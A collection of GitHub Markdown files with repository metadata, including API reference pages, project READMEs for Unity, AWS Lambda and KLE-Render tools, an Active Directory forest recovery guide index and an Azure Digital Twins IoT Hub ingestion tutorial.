] | 2,093 | 2017-02-09T21:52:45.000Z | 2022-03-25T22:23:18.000Z | windows.ui.xaml.media/gradientstop_offset.md | angelazhangmsft/winrt-api | 1f92027f2462911960d6be9333b7a86f7b9bf457 | [
"CC-BY-4.0",
"MIT"
] | 620 | 2017-02-08T19:19:44.000Z | 2022-03-29T11:38:25.000Z | ---
-api-id: P:Windows.UI.Xaml.Media.GradientStop.Offset
-api-type: winrt property
---
<!-- Property syntax
public double Offset { get; set; }
-->
# Windows.UI.Xaml.Media.GradientStop.Offset
## -description
Gets the location of the gradient stop within the gradient vector.
Equivalent WinUI property: [Microsoft.UI.Xaml.Media.GradientStop.Offset](/windows/winui/api/microsoft.ui.xaml.media.gradientstop.offset).
## -xaml-syntax
```xaml
<GradientStop Offset="double"/>
```
## -property-value
The relative location of this gradient stop along the gradient vector. The default is 0.
## -remarks
## -examples
## -see-also
| 20.290323 | 137 | 0.732909 | eng_Latn | 0.681797 |
e04d9517afef1d87737f6e7c28df26cc58c0f829 | 47 | md | Markdown | Published/ItemCostCalculator/README.md | Ailtop/uModPlugins | 2b3b0ade8c6181b8034b1eff45ddd3170ec8688f | [
"MIT"
] | null | null | null | Published/ItemCostCalculator/README.md | Ailtop/uModPlugins | 2b3b0ade8c6181b8034b1eff45ddd3170ec8688f | [
"MIT"
] | null | null | null | Published/ItemCostCalculator/README.md | Ailtop/uModPlugins | 2b3b0ade8c6181b8034b1eff45ddd3170ec8688f | [
"MIT"
] | null | null | null | # ItemCostCalculator
[中文文档](./README.zh-CN.md) | 15.666667 | 25 | 0.723404 | yue_Hant | 0.968018 |
e04dc609b5525a593070162405d8e3378208106f | 2,312 | md | Markdown | aws/lambda/README.md | openregister/deployment | 13a442c503288eedbdcd54590ddac8360904f5aa | [
"MIT"
] | 5 | 2015-08-21T15:27:27.000Z | 2019-05-07T10:05:41.000Z | aws/lambda/README.md | openregister/deployment | 13a442c503288eedbdcd54590ddac8360904f5aa | [
"MIT"
] | 142 | 2015-08-05T09:06:23.000Z | 2020-01-23T16:40:11.000Z | aws/lambda/README.md | openregister/deployment | 13a442c503288eedbdcd54590ddac8360904f5aa | [
"MIT"
] | 4 | 2015-08-21T15:29:59.000Z | 2021-04-11T08:25:53.000Z | # Terraform configuration for Registers Lambdas
## Prerequisites
* [Node.js](https://nodejs.org/) v8.1.0 (note if you have a different Node version, you can use [nvm](https://github.com/creationix/nvm) to use this version for this directory)
* [Terraform](https://www.terraform.io/). You should install Terraform using the method described [here](https://github.com/openregister/deployment/blob/master/README.md#prerequisites)
* `gsed` you can install this via Homebrew: `brew install gnu-sed`
* `python3` you can install this via Homebrew: `brew install python3`
* `virtualenv` you can install this via pip3: `pip3 install virtualenv`
## Using
Run a plan:
```
make plan
```
Review and apply changes:
```
make apply
```
If you updated the Lambda@Edge functions (`cloudfront-post-logger` or `log-api-key-to-cloudwatch`) you must apply the Registers Terraform to associate the new Lambda versions with the Registers CloudFront distributions. Perform [Update terraform config (steps 6 - 8)](../../README.md#6-update-terraform-config)
## Running Lambdas Locally
### Setup
Install [aws-sam-cli](https://github.com/awslabs/aws-sam-cli) in a virtual environment:
```
python3 -m venv .venv/
source .venv/bin/activate
pip install -r requirements.txt
```
The lambdas are defined in `template.yml` files in the `node` and `python` subdirectories.
### Node lambdas
Run these commands from the `deployment/aws/lambda/node` directory.
Cloudfront POST request logger:
```
sam local invoke "CloudfrontPostLoggerFunction" --event ./cloudfront-post-logger/example_request.json
```
Cache invalidator:
```
sam local invoke "CacheInvalidatorFunction" --event ./cache-invalidator/example_event.json
```
API key request logger:
```
sam local invoke CloudfrontLogAPIKeyFunction -e log-api-key-to-cloudwatch/example.json
```
Send API key to Google Analytics:
```
sam local invoke CloudfrontLogsApiKeyToGoogleAnalyticsFunction -e cloudfront-logs-api-key-to-google-analytics/examples/logs-no-key.json
```
### Python lambdas
Run these commands from the `deployment/aws/lambda/python` directory:
Request log anonymiser:
```
TARGET_BUCKET=target-bucket-name sam local invoke LogAnonymiser -e log-anonymiser/put-bucket-event.json
```
Note that the bucket to read from is defined by the event json, so edit as appropriate.
| 32.111111 | 311 | 0.763408 | eng_Latn | 0.753329 |
e04e2843de5dd882f92faabef857c05f5d424e57 | 4,262 | md | Markdown | README.md | Rr01010010/Unity-Building-Creation-Editor | 9539010e49b461089f3d09142a8074d815810da4 | [
"MIT"
] | null | null | null | README.md | Rr01010010/Unity-Building-Creation-Editor | 9539010e49b461089f3d09142a8074d815810da4 | [
"MIT"
] | null | null | null | README.md | Rr01010010/Unity-Building-Creation-Editor | 9539010e49b461089f3d09142a8074d815810da4 | [
"MIT"
] | null | null | null | # Unity-Building-Creation-Editor
## О проекте
Небольшой плагин, позволяющий легко и быстро создавать здания, комнаты на вашем уровне.
Инструмент особенно полезен при прототипировании уровня так как, позволяет "накидать" уровень и быстро его опробовать.
***
## Требования
Необходима библиотека **Json.NET - Newtonsoft** либо из [Unity Asset Store](https://assetstore.unity.com/packages/tools/input-management/json-net-for-unity-11347), либо из [nuget.org](https://www.nuget.org/packages/Newtonsoft.Json/12.0.2), только в последнем случае вам надо выбрать версию пакета, и нажать в меню справа _Download package_, после чего распаковать архиватором newtonsoft.json.nupkg файл, и в папке найти нужную вам dll.
После этого библиотеку **Json.NET - Newtonsoft** и плагин **Unity-Building-Creation-Editor** необходимо скинуть в проект Unity (желательно библиотеку скинуть в папку плагина ThirdParty, а после этого ThirdParty скинуть в папку вашего проекта). Тогда Unity все слинкует. И всё должно заработать
***
## Использование
[**Видео туториал с таймкодом**](https://youtu.be/I-GhEakibtU?t=502).
Работа в редакторе происходит в **3 этапа: 1.Node Creator, 2.Wall Creator, 3.Room Creator**, на трёх сценах с соответсвующими названиями. На каждой сцене **управляющий скрипт прикреплён к камере**, с помощью скрипта вы можете управлять настройками редактора, загружать и сохранять данные. Внутри каждого скрипта указан путь к папке с Json-ами, и название уровня в поле LevelName, меняя имя этого поля, вы можете создавать новые уровни или переключатся, на уже созданные.
**1.Node Creator**
Для того чтобы быстро создать ноды, перейдите в сцену **1.Node Creator** и **запустите её в режиме playmode**, с помощью зеленной коробки вы можете расставлять ноды, по нажатию левой кнопки мыши. И удалять ноды, при повторном нажатии. Камера автоматически преследует коробку. При помощи колесика мыши, вы можете менять масштаб. А меняя поле HeightOfNewPoint, вы меняете высоту устанавливоемой ноды. С помощью полей Sensetive X/Y, вы можете настроить чувствительность мыши для передвижения коробки. При помощи поля CellSize вы можете настроить ширину ячейки, а при помощи GridSize, установить ширину отрисованного поля. (Однако вы, также можете устанавливать узлы, вне этого поля).
*Сохранение узлов*
По окончанию работы сохраните узлы с помощью кнопки _Create Points_ на игровом объекте Main Camera, загрузить ноды для редактирования вы можете по кнопке _Download Nodes_.
**2.Wall Creator**
Чтобы связать ноды образуя стены, перейдите в сцену **2.Wall Creator**, с помощью кнопки _Download Nodes_ на игровом объекте Main Camera вы построите ноды как игровые объекты, сохраненные в прошлой сцене. Нажимая на кнопку _Linking Request_ в нодах вы можете связывать и развязывать ноды, образуя их в форме нужного вам здания. **Однако запустив сцену в playmode** вы можете связывать и развязывать ноды быстрее. Для этого, с аналогичным управляением в сцене образом в этой сцене _1.Node Creator_ вы можете управлять коробкой. Нажимая левую кнопку мыши вы можете, выделить два узла, и образовать между ними связь, при повторном выделении уже соедененных узлов, связь удаляется. **При нажатии на правую кнопку мыши**, на месте прицела - коробки, появится новая нода. (Если перейти во вкладку сцены, не выключая Playmode, вы можете перемещать ноды, как обычные GameObjects).
Так постепенно связывая нужные вам ноды, выстроется силует будующего здания.
После окончания работы нажмите на кнопки
<li> "Save ListNodes" в камере, чтобы сохранить связи,
<li> "Download ListNodes" в камере, чтобы загрузить и отредактировать форму здания,
**3.Room Creator**
Чтобы установить стены, на место связей, перейдите в сцену **3.Room Creator**, с помощью кнопки _Download ListNodes_, на игровом объекте Main Camera, вы загрузите связи. Далее в камере, вы можете настроить параметры будующих стен и загрузить Prefab стены. Настроив параметры стен, нажмите кнопку _Build Rooms_, если все было сделано правильно, то у вас появится Container с сгенерированными стенами. Далее рекомендуется удалить дубликаты стен (у каждой стены на самом деле внутри 2 стены). После чего вы можете сохранить сцену как новый уровень, или сохранить стены как префаб перетащив контейнер в Project Manager, в папку Assets.
| 142.066667 | 872 | 0.802675 | rus_Cyrl | 0.985202 |
e04e39bdf20375712c19413c4696e44337b1935b | 313 | md | Markdown | README.md | jinyanshenxing/zhuye | 967c7577dd674b6fc2f448e899d8cf28b1d9ab25 | [
"MIT"
] | null | null | null | README.md | jinyanshenxing/zhuye | 967c7577dd674b6fc2f448e899d8cf28b1d9ab25 | [
"MIT"
] | null | null | null | README.md | jinyanshenxing/zhuye | 967c7577dd674b6fc2f448e899d8cf28b1d9ab25 | [
"MIT"
] | null | null | null | # zhuye
[](https://github.com/jinyanshenxing/zhuye/actions/workflows/generate.yml)
jinyanshenxing's navigation site, generated by [gena](https://github.com/x1ah/gena)
Site address: https://jinyanshenxing.github.io/zhuye/ | 44.714286 | 164 | 0.789137 | yue_Hant | 0.33631 |
e04eaf4cf7c571f2fb8f5732cecfbfdce7e29ffb | 546 | md | Markdown | README.md | ConnectionMaster/.github-6 | 1b4b4c65084d5153251bd1e84dbf6ce29ce115b9 | [
"MIT"
] | 5 | 2019-07-20T06:18:18.000Z | 2022-03-13T12:02:23.000Z | README.md | alaizzi99/.github | 1b4b4c65084d5153251bd1e84dbf6ce29ce115b9 | [
"MIT"
] | 1 | 2022-02-10T12:36:04.000Z | 2022-02-10T12:36:04.000Z | README.md | alaizzi99/.github | 1b4b4c65084d5153251bd1e84dbf6ce29ce115b9 | [
"MIT"
] | 9 | 2019-07-14T22:15:51.000Z | 2021-11-07T18:00:26.000Z | # .github
These are the [default community health files](https://help.github.com/en/articles/creating-a-default-community-health-file-for-your-organization) for the Azure organization on GitHub.
# Contributing
Microsoft projects adopt the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/). For more information see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) or contact [[email protected]](mailto:[email protected]) with any additional questions or comments.
| 68.25 | 332 | 0.805861 | eng_Latn | 0.837332 |
e04f601b6ca0677161f6f8bc38eaf74bfbec050f | 6,135 | md | Markdown | README.md | CQCumbers/kle_render | 930f2079e332c9e6fe9e927b61d1e29a9a171026 | [
"MIT"
] | 120 | 2017-05-23T18:07:04.000Z | 2022-02-25T00:45:41.000Z | README.md | CQCumbers/kle_render | 930f2079e332c9e6fe9e927b61d1e29a9a171026 | [
"MIT"
] | 23 | 2017-10-26T01:06:15.000Z | 2022-03-12T00:59:07.000Z | README.md | CQCumbers/kle_render | 930f2079e332c9e6fe9e927b61d1e29a9a171026 | [
"MIT"
] | 20 | 2017-06-07T12:30:00.000Z | 2022-03-09T20:02:54.000Z | # KLE-Render
> Get prettier images of Keyboard Layout Editor designs
This project uses Python, Pillow, and Flask to serve up more realistic visualizations of custom mechanical keyboard layouts. It works by stretching, tinting, and tiling base images of a 1u keycap. Check it out at [kle-render.herokuapp.com](http://kle-render.herokuapp.com/). You can also see a [sample render](#sample-image) of Nantucket Selectric below.
## Frequently Asked Questions
### What layouts are supported?
KLE-Render should support any layout created with keyboard-layout-editor though some may not render exactly as expected. Specifically, certain very uncommon unicode glyphs may not be displayed. Custom legend images take up the full width of the keycap and only one per key can be used. The base images are only of SA and GMK keycaps, but most layouts in DSA, DCS, OEM, or even beamspring profiles should still look pretty close. Sculpted row profiles are not supported; everything is assumed to be uniform row 3.
### How do I include icons and novelties in my layout?
Many common icons and symbols are part of [Unicode](https://unicode-table.com), and can be rendered simply by pasting the appropriate character into the legend text boxes in keyboard-layout-editor. To match the default GMK icons, you can copy characters from the [GMK Icons Template](http://www.keyboard-layout-editor.com/#/gists/afc75b1f6ebee743ff0e2f589b0fc68d). Less common icons are available as part of the Font Awesome or Keyboard-Layout-Editor icon sets under the Character Picker dropdown.
For truly custom legends though, you'll have to use an html image tag, like this one `<img src='http://i.imgur.com/QtgaNKa.png' width='30'>`. The src parameter here should point to a PNG image with your legend on a transparent background. Note that KLE-Render does not support combining these custom legend images with regular text on the same key, and ignores any sizing or position info - the image is always resized to cover the entire top of the keycap. For reference see the SA and GMK kitting templates below.
### Are custom fonts supported?
There is limited support for custom fonts, but this should be considered an advanced feature. Most layouts won't work without some changes to the custom styling. For more details on how and why see [issue #7](https://github.com/CQCumbers/kle_render/issues/7#issuecomment-880827473).
### What do I do if I get an error page when trying to render?
If you get an internal server error when attempting to render a layout, first make sure that your JSON input is downloaded properly or that your gist url actually exists. If the error persists, please contact me with the gist link or JSON that is causing the problem and I may be able to fix it. I am CQ\_Cumbers on reddit and geekhack.
### Why don't my renders look like the ones on Massdrop?
This tool can generate more realistic renders of arbitrary keyboard layouts, but because it works by stretching and tinting grayscale images, there are many limitations on realism as compared to actual 3D renders. If you're looking for fast and photorealistic visualizations [kbrenders.com](http://www.kbrenders.com) can be a useful resource. For certain custom work, however, you may still have to do post-processing in photoshop or commission a professional like thesiscamper to work with you.
### How do I turn my set design into a group buy?
If you're looking to create a keycap set for a group buy livingspeedbump (creator of SA Jukebox) has a nice [guide](https://www.keychatter.com/2015/10/10/how-to-create-a-keycap-set-for-a-group-buy/) up on keychatter.
## Templates
The following templates have their legend sizes and keycap profiles pre-configured for accurate rendering. Use them as a starting point for your own designs!
- Example Kitting - [SA](http://www.keyboard-layout-editor.com/#/gists/6331e126fa6340711e53a0806d57cde5)/[GMK](http://www.keyboard-layout-editor.com/#/gists/a3a9791b1068f1100b151c33debf660f)
- Mech Mini 2 (40%) - [SA](http://www.keyboard-layout-editor.com/#/gists/ea2a231112ffceae047494ac9a93e706)/[GMK](http://www.keyboard-layout-editor.com/#/gists/eed1f1854dda3999bcdd730f0143c627)
- Klippe (60%) - [SA](http://www.keyboard-layout-editor.com/#/gists/f8369e8d6ae12c6d30bbf6db9731bca5)/[GMK](http://www.keyboard-layout-editor.com/#/gists/c2aedbf20e6a1ee5320a0f89b114d6da)
- J-02 (HHKB) - [SA](http://www.keyboard-layout-editor.com/#/gists/1e01f5c46bcc3ba388f84d3a26f2e2eb)/[GMK](http://www.keyboard-layout-editor.com/#/gists/d5ef16b69b4ea15569d7a319bbf90a8e)
- RAMA M65 (65%) - [SA](http://www.keyboard-layout-editor.com/#/gists/3ca3649e1d048134ddd0e835d1dd735b)/[GMK](http://www.keyboard-layout-editor.com/#/gists/4319599274157d2a0dd0e38328b76878)
- GMMK Pro (75%) - [SA](http://www.keyboard-layout-editor.com/#/gists/c1a1d76bfcd236bc36e1c04c1e86a0d8)/[GMK](http://www.keyboard-layout-editor.com/#/gists/8ab0de3dd5dc804ecb052924a1c45be5)
- JP01 (Arisu) - [SA](http://www.keyboard-layout-editor.com/#/gists/4f06c7adcce33046a463084af34aae60)/[GMK](http://www.keyboard-layout-editor.com/#/gists/de533ff9b29225bb65a6155151030673)
- Mech27 (TKL) - [SA](http://www.keyboard-layout-editor.com/#/gists/10629d008a99d8d6eb6f8c59414b5dd8)/[GMK](http://www.keyboard-layout-editor.com/#/gists/6e6692825b348f40c040ca9750e469a8)
- Espectro (96%) - [SA](http://www.keyboard-layout-editor.com/#/gists/6b996bea3ebf8a85866ddea606e25de4)/[GMK](http://www.keyboard-layout-editor.com/#/gists/6a03012a82e7bbca14db635142913a7)
- Cypher (1800-like) - [SA](http://www.keyboard-layout-editor.com/#/gists/9b5535a779ae9f095da3b8a73a39a3cf)/[GMK](http://www.keyboard-layout-editor.com/#/gists/27bc8c126110952cc77c69ef972a7d0d)
- Triangle (Full-size) - [SA](http://www.keyboard-layout-editor.com/#/gists/b86a688e6502fcc910d4b32ca2fa642e)/[GMK](http://www.keyboard-layout-editor.com/#/gists/11f7fc1a19c7f2210f560a93c8ab82a2)
- Modifier Icons - [GMK](http://www.keyboard-layout-editor.com/#/gists/afc75b1f6ebee743ff0e2f589b0fc68d)
## Sample Image
Nantucket Selectric ([JSON](http://www.keyboard-layout-editor.com/#/gists/4de8adb88cb4c45c2f43))

| 127.8125 | 515 | 0.788264 | eng_Latn | 0.925964 |
e0500124e0c0d088ad585ed1d58d782bc83ce66b | 2,028 | md | Markdown | WindowsServerDocs/identity/ad-ds/manage/AD-Forest-Recovery-Guide.md | hsebs/windowsserverdocs.ko-kr | 5df4d1fdc437c37e2c89d3c188db7354df97dd4b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | WindowsServerDocs/identity/ad-ds/manage/AD-Forest-Recovery-Guide.md | hsebs/windowsserverdocs.ko-kr | 5df4d1fdc437c37e2c89d3c188db7354df97dd4b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | WindowsServerDocs/identity/ad-ds/manage/AD-Forest-Recovery-Guide.md | hsebs/windowsserverdocs.ko-kr | 5df4d1fdc437c37e2c89d3c188db7354df97dd4b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
ms.assetid: 680e05ac-f9be-4b07-a9f4-cd6da5835952
title: Active Directory 포리스트 복구 가이드
description: 이 가이드에서는 백업, 복원 및 active directory 재해 복구에 대 한 지침을 제공 합니다.
ms.author: joflore
author: MicrosoftGuyJFlo
manager: mtillman
ms.date: 08/09/2018
ms.topic: article
ms.prod: windows-server
ms.technology: identity-adds
ms.openlocfilehash: ee31076669351a92caf79c6b8972ccdd68b347aa
ms.sourcegitcommit: 6aff3d88ff22ea141a6ea6572a5ad8dd6321f199
ms.translationtype: MT
ms.contentlocale: ko-KR
ms.lasthandoff: 09/27/2019
ms.locfileid: "71390443"
---
# <a name="active-directory-forest-recovery-guide"></a>Active Directory 포리스트 복구 가이드
>적용 대상: Windows Server 2016, Windows Server 2012 및 2012 R2, Windows Server 2008 및 2008 R2, Windows Server 2003
이 가이드에는 포리스트 전체 오류로 인해 포리스트의 모든 Dc (도메인 컨트롤러)가 정상적으로 작동 하지 않을 경우 Active Directory® 포리스트를 복구 하기 위한 모범 사례 권장 사항이 포함 되어 있습니다. 포함 된 단계는 특정 환경에 맞게 사용자 지정할 수 있는 포리스트 복구 계획의 템플릿으로 사용 됩니다. 이러한 단계는 Microsoft® Windows Server 2016, 2012 R2, 2012, 2008 R2, 2008 및 2003 운영 체제를 실행 하는 Dc에 적용 됩니다.
> [!NOTE]
> Windows Server 2003를 실행 하는 Dc에 고유한 절차는 [AD 포리스트 복구 Windows server 2003](AD-Forest-Recovery-Windows-Server-2003.md)에 통합 되어 있습니다.
## <a name="steps-outlined-in-this-guide"></a>이 가이드에 설명 된 단계
- [AD 포리스트 복구 - 필수 조건](AD-Forest-Recovery-Prerequisties.md)
- [AD 포리스트 복구-사용자 지정 포리스트 복구 계획 고안](AD-Forest-Recovery-Devising-a-Plan.md)
- [AD 포리스트 복구 - 복구 단계](AD-Forest-Recovery-Steps-For-Restoring.md)
- [AD 포리스트 복구-문제 식별](AD-Forest-Recovery-Identify-the-Problem.md)
- [AD 포리스트 복구-복구 방법을 결정 합니다.](AD-Forest-Recovery-Determine-how-to-Recover.md)
- [AD 포리스트 복구-초기 복구 수행](AD-Forest-Recovery-Perform-initial-recovery.md)
- [AD 포리스트 복구 - 절차](AD-Forest-Recovery-Procedures.md)
- [AD 포리스트 복구-질문과 대답](AD-Forest-Recovery-FAQ.md)
- [AD 포리스트 복구-다중 도메인 포리스트 내에서 단일 도메인 복구](AD-Forest-Recovery-Single-Domain-in-Multidomain-Recovery.md)
- [AD 포리스트 복구 - 가상화](AD-Forest-Recovery-Virtualization.md)
- [AD 포리스트 복구-Windows Server 2003 도메인 컨트롤러를 사용 하 여 포리스트 복구](AD-Forest-Recovery-Windows-Server-2003.md)
| 49.463415 | 283 | 0.745069 | kor_Hang | 0.999893 |
e050af92e0b8922e2cf83d92834d02bccd424b95 | 1,698 | md | Markdown | api/Access.Form.CommandBeforeExecute(even).md | seydel1847/VBA-Docs | b310fa3c5e50e323c1df4215515605ae8da0c888 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | api/Access.Form.CommandBeforeExecute(even).md | seydel1847/VBA-Docs | b310fa3c5e50e323c1df4215515605ae8da0c888 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | api/Access.Form.CommandBeforeExecute(even).md | seydel1847/VBA-Docs | b310fa3c5e50e323c1df4215515605ae8da0c888 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Form.CommandBeforeExecute event (Access)
keywords: vbaac10.chm13673
f1_keywords:
- vbaac10.chm13673
ms.prod: access
api_name:
- Access.Form.CommandBeforeExecute
ms.assetid: 4fb1c072-3781-8a52-bc9a-2e26d2738789
ms.date: 06/08/2017
localization_priority: Normal
---
# Form.CommandBeforeExecute event (Access)
Occurs before a specified command is executed. Use this event when you want to impose certain restrictions before a particular command is executed.
## Syntax
_expression_. `CommandBeforeExecute`( ` _Command_`, ` _Cancel_` )
_expression_ A variable that represents a [Form](Access.Form.md) object.
## Parameters
|Name|Required/Optional|Data type|Description|
|:-----|:-----|:-----|:-----|
| _Command_|Required|**Variant**| The command that is going to be executed.|
| _Cancel_|Required|**Object**| Set the **Value** property of this object to **True** to cancel the command.|
## Return value
nothing
## Remarks
The **OCCommandId**, **ChartCommandIdEnum**, and **PivotCommandId** constants contain lists of the supported commands for each of the Microsoft Office Web Components.
## Example
The following example demonstrates the syntax for a subroutine that traps the **CommandBeforeExecute** event.
```vb
Private Sub Form_CommandBeforeExecute( _
ByVal Command As Variant, ByVal Cancel As Object)
Dim intResponse As Integer
Dim strPrompt As String
strPrompt = "Cancel the command?"
intResponse = MsgBox(strPrompt, vbYesNo)
If intResponse = vbYes Then
Cancel.Value = True
Else
Cancel.Value = False
End If
End Sub
```
## See also
[Form Object](Access.Form.md)
[!include[Support and feedback](~/includes/feedback-boilerplate.md)] | 22.64 | 167 | 0.742049 | eng_Latn | 0.874859 |
e051bf77bacf81c961150ab16f2ac204410a5f64 | 11,152 | md | Markdown | articles/digital-twins/how-to-ingest-iot-hub-data.md | Microsoft/azure-docs.cs-cz | 1e2621851bc583267d783b184f52dc4b853a058c | [
"CC-BY-4.0",
"MIT"
] | 6 | 2017-08-28T07:43:21.000Z | 2022-01-04T10:32:24.000Z | articles/digital-twins/how-to-ingest-iot-hub-data.md | MicrosoftDocs/azure-docs.cs-cz | 1e2621851bc583267d783b184f52dc4b853a058c | [
"CC-BY-4.0",
"MIT"
] | 428 | 2018-08-23T21:35:37.000Z | 2021-03-03T10:46:43.000Z | articles/digital-twins/how-to-ingest-iot-hub-data.md | Microsoft/azure-docs.cs-cz | 1e2621851bc583267d783b184f52dc4b853a058c | [
"CC-BY-4.0",
"MIT"
] | 16 | 2018-03-03T16:52:06.000Z | 2021-12-22T09:52:44.000Z | ---
title: Ingestování telemetrie z IoT Hubu
titleSuffix: Azure Digital Twins
description: Podívejte se, jak ingestovat zprávy telemetrie zařízení z IoT Hub.
author: alexkarcher-msft
ms.author: alkarche
ms.date: 9/15/2020
ms.topic: how-to
ms.service: digital-twins
ms.openlocfilehash: a5e00ef81afc709a9072eedbb07983057f57eb08
ms.sourcegitcommit: b4fbb7a6a0aa93656e8dd29979786069eca567dc
ms.translationtype: MT
ms.contentlocale: cs-CZ
ms.lasthandoff: 04/13/2021
ms.locfileid: "107304290"
---
# <a name="ingest-iot-hub-telemetry-into-azure-digital-twins"></a>Ingestování IoT Hub telemetrie do digitálních vláken Azure
Digitální vlákna Azure se řídí daty ze zařízení IoT a dalších zdrojů. Běžný zdroj dat zařízení, která se mají používat v rámci digitálních vláken Azure, je [IoT Hub](../iot-hub/about-iot-hub.md).
Proces pro ingestování dat do digitálních vláken Azure je nastavení externího výpočetního prostředku, jako je například funkce, kterou provedete pomocí [Azure Functions](../azure-functions/functions-overview.md). Funkce přijme data a pomocí [rozhraní DigitalTwins API](/rest/api/digital-twins/dataplane/twins) nastaví vlastnosti nebo události telemetrie pro [digitální vlákna](concepts-twins-graph.md) .
Tento postup popisuje, jak dokumentovat pomocí procesu vytváření funkce, která může ingestovat telemetrie z IoT Hub.
## <a name="prerequisites"></a>Požadavky
Než budete pokračovat v tomto příkladu, budete muset nastavit následující prostředky jako požadavky:
* **Centrum IoT**. Pokyny najdete v části *vytvoření IoT Hub* [tohoto IoT Hub rychlé](../iot-hub/quickstart-send-telemetry-cli.md)spuštění.
* **Instance digitálního vlákna Azure** , která bude přijímat telemetrii zařízení. Pokyny najdete v tématu [*Postup: nastavení instance a ověřování digitálních vláken Azure*](./how-to-set-up-instance-portal.md).
### <a name="example-telemetry-scenario"></a>Ukázkový scénář telemetrie
Tento postup popisuje, jak odesílat zprávy z IoT Hub do digitálních vláken Azure pomocí funkce v Azure. K dispozici je celá řada možných konfigurací a vyhovujících strategií, které můžete použít pro posílání zpráv, ale příklad tohoto článku obsahuje následující části:
* Termostat zařízení v IoT Hub se známým ID zařízení
* Digitální vlákna představující zařízení s ID odpovídajícího
> [!NOTE]
> V tomto příkladu se používá jednoznačné ID mezi ID zařízení a odpovídajícím ID digitálního vlákna, ale je možné poskytnout propracovanější mapování ze zařízení na jeho dvojitou hodnotu (například s tabulkou mapování).
Pokaždé, když je událost telemetrie teploty odeslána zařízením termostatu, funkce zpracuje telemetrii a vlastnost *teploty* digitálního vlákna by měla aktualizovat. Tento scénář je popsaný v diagramu níže:
:::image type="content" source="media/how-to-ingest-iot-hub-data/events.png" alt-text="Diagram IoT Hub zařízení odesílá telemetrie teplot prostřednictvím IoT Hub do funkce v Azure, která aktualizuje vlastnost teploty v případě, že je v rámci služby Azure Digital v Azure." border="false":::
## <a name="add-a-model-and-twin"></a>Přidání modelu a digitálního dvojčete
V této části nastavíte [digitální dvojitou](concepts-twins-graph.md) hodnotu v digitálních proobjektech Azure, které budou představovat termostatické zařízení a budou se aktualizovat informacemi z IoT Hub.
Pro vytvoření vlákna typu termostatu budete muset nejprve nahrát termostatový [model](concepts-models.md) do instance, která popisuje vlastnosti termostatu a později se použije k vytvoření vlákna.
[!INCLUDE [digital-twins-thermostat-model-upload.md](../../includes/digital-twins-thermostat-model-upload.md)]
Pak budete muset **vytvořit jeden z těchto vláken pomocí tohoto modelu**. Pomocí následujícího příkazu vytvořte termostat s názvem **thermostat67** a nastavte 0,0 jako počáteční hodnotu teploty.
```azurecli-interactive
az dt twin create --dtmi "dtmi:contosocom:DigitalTwins:Thermostat;1" --twin-id thermostat67 --properties '{"Temperature": 0.0,}' --dt-name {digital_twins_instance_name}
```
> [!Note]
> Pokud používáte Cloud Shell v prostředí PowerShellu, může být nutné, aby se znaky uvozovek v vložených polích JSON vyhnuly jejich správné analýze. Tady je příkaz pro vytvoření vlákna s touto úpravou:
>
> Vytvořit dvojitou dvojici:
> ```azurecli-interactive
> az dt twin create --dtmi "dtmi:contosocom:DigitalTwins:Thermostat;1" --twin-id thermostat67 --properties '{\"Temperature\": 0.0,}' --dt-name {digital_twins_instance_name}
> ```
Po úspěšném vytvoření vlákna by výstup CLI z příkazu vypadal přibližně takto:
```json
{
"$dtId": "thermostat67",
"$etag": "W/\"0000000-9735-4f41-98d5-90d68e673e15\"",
"$metadata": {
"$model": "dtmi:contosocom:DigitalTwins:Thermostat;1",
"Temperature": {
"ackCode": 200,
"ackDescription": "Auto-Sync",
"ackVersion": 1,
"desiredValue": 0.0,
"desiredVersion": 1
}
},
"Temperature": 0.0
}
```
## <a name="create-a-function"></a>Vytvoření funkce
V této části vytvoříte funkci Azure pro přístup k digitálním událostem Azure a budete moct aktualizovat vlákna na základě událostí telemetrie IoT, které obdrží. Pomocí následujících kroků vytvořte a publikujte funkci.
#### <a name="step-1-create-a-function-app-project"></a>Krok 1: vytvoření projektu Function App
Nejprve v aplikaci Visual Studio vytvořte nový projekt aplikace Function App. Pokyny k tomu, jak to provést, naleznete v části [**Vytvoření aplikace Function App v sadě Visual Studio**](how-to-create-azure-function.md#create-a-function-app-in-visual-studio) tématu *Postupy: nastavení funkce pro zpracování dat* v článku.
#### <a name="step-2-fill-in-function-code"></a>Krok 2: vyplnění kódu funkce
Přidejte do projektu následující balíčky:
* [Azure. DigitalTwins. Core](https://www.nuget.org/packages/Azure.DigitalTwins.Core/)
* [Azure. identity](https://www.nuget.org/packages/Azure.Identity/)
* [Microsoft. Azure. WebJobs. Extensions. EventGrid](https://www.nuget.org/packages/Microsoft.Azure.WebJobs.Extensions.EventGrid/)
Přejmenujte ukázkovou funkci *function1. cs* , kterou Visual Studio vygenerovalo s novým projektem na *IoTHubtoTwins. cs*. Nahraďte kód v souboru následujícím kódem:
:::code language="csharp" source="~/digital-twins-docs-samples/sdks/csharp/IoTHubToTwins.cs":::
Uložte kód funkce.
#### <a name="step-3-publish-the-function-app-to-azure"></a>Krok 3: publikování aplikace Function App do Azure
Publikujte projekt pomocí funkce *IoTHubtoTwins. cs* do aplikace Function App v Azure.
Pokyny k tomu, jak to provést, najdete v části [**publikování aplikace Function App do Azure**](how-to-create-azure-function.md#publish-the-function-app-to-azure) tématu *Postupy: nastavení funkce pro zpracování dat* v článku.
#### <a name="step-4-configure-the-function-app"></a>Krok 4: Konfigurace aplikace Function App
Dále přiřaďte k této funkci **roli přístupu** a **nakonfigurujte nastavení aplikace** tak, aby měla přístup k instanci digitálních vláken Azure. Pokyny k tomu, jak to provést, najdete v části [**nastavení přístupu zabezpečení pro aplikaci Function App**](how-to-create-azure-function.md#set-up-security-access-for-the-function-app) tématu *Postupy: nastavení funkce pro zpracování dat* v článku.
## <a name="connect-your-function-to-iot-hub"></a>Připojte funkci k IoT Hub
V této části nastavíte funkci jako cíl události pro data zařízení služby IoT Hub. Tím se zajistí, že se data ze zařízení z termostatu v IoT Hub pošlou službě Azure Function za účelem zpracování.
